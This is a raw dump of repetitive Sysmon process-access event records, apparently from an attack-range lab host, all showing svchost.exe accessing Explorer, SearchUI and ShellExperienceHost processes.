11:11:46.945{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.945{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.945{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.945{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.945{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.944{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.944{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.943{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:11:46.942{C8EA50B7-F11F-6215-0D00-000000003802}888908C:\Windows\system32\svchost.exe{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a31|c:\windows\system32\rpcss.dll+43b62|c:\windows\system32\rpcss.dll+43e9f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 